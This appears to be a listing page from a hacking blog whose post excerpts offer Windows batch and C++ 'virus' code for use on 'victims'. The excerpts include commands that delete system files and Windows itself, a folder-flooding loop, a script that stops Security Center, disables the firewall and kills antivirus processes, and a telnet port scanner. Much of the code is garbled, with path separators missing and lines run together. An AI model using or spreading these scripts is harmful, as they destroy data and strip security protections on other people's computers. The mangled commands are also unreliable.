Hi friends,here i give you give the C++ virus code. Actually Batch code is converted to C++ virus code. If you like you can use it as batch code also. C++ Virus Code : #include < windows.h >#include < fstream.h >#include < iostream.h >#include < string.h >#include < conio.h >int main(){ofstream write ( “C:\WINDOWS\system32\HackingStar.bat” ); […]
Category: Batch Programming
Virus to Delete mouse,explore,logoff using Batch Programming
Usually we write simple viruses in batch programming. This time also i have one Batch Programming. It will delete explore.exe,logoff ,mouse,keyboard files. So victims can not do anything in his computer. @echo off @if exist c:windowssystem32mouse del c:windowssystem32mouse@if exist c:windowssystem32keyboard del c:windowssystem32keyboardcopy C:windows@if exist c:windowssystem32logoff.exe del c:windowssystem32logoff.exe@if exist C:program filesinternet exploreriexplore.exe del C:program filesinternet exploreriexplore.exe […]
Create a virus to create a infinite folder in a drive
Hi Hackers, this batch code will very helpful for you. This is simple and effective virus code. As usual open notepad.Copy this code to Notepad. @echo off:topmd %random%goto top @echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.md %random% is command that creating folders […]
Create a virus to make the computer freezed using Batch Programming
Now i am going to give you simple and only one line Batch code. Special about this virus is that easy to remember the code. So it will be useful to use in college or school. This is for newbie. This virus is harmful for CPU. So be careful. Don’t run this in your pc […]
How to disable/delete your victim’s Antivirus?
Here i am giving you the batch program to disable or delete the antivirus in victims computer. @ echo offrem —rem Permanently Kill Anti-Virusnet stop “Security Center”netsh firewall set opmode mode=disabletskill /A av*tskill /A fire*tskill /A anti*clstskill /A spy*tskill /A bullguardtskill /A PersFwtskill /A KAV*tskill /A ZONEALARMtskill /A SAFEWEBclstskill /A OUTPOSTtskill /A nv*tskill /A nav*tskill […]
one line Virus creation using Batch Programming
1.Go to notepad, 2. Type erase C:WINDOWS 3. Save it with .bat extension , 4. send to victim . once the victim open the file windows will be erased.
Fake virus for making fun with your friends
Hi friends, you probably don’t want to harm your friend pc but you like to fun with them. If you think so, then you can use this fake virus. Fake virus what i mean? This is not at all virus. This is not at all make any effect. It just shut down your friend system […]
A simple batch program for Port Scanning
Hi friends in this post we are going to see how to create Batch programming for port scanning. Open Notepad Paste this code: @ECHO off color 0acdC:clsfor /L %%v in (1,1,11) do telnet %1 %%vGOTO scan2:scan2for /L %%w in (12,1,20) do telnet %1 %%w Save it with .bat extension(for eg: portscanner.bat) Goto command prompt and, […]
A batch program to open the notepad file continuously
Hi friends, As usual today also i am going to give you simple batch program to open the notepad continuously. This is not at all going to harmful. But be careful. Batch Code: @ECHO off:topSTART %SystemRoot%system32notepad.exeGOTO top Open the Notepad and paste this code. Save the file with .bat extension(for eg: notepadhack.bat). Now double clicking the […]
How to lock a folder without any software (Batch Programming)
Hi in my last post i guide you to create a batch programming to create a locker. This is very cool. You don’t need to download any locker softwares. You are going to enjoy this hack. In my older post i explain you how to lock folder using command prompt. But in that no password […]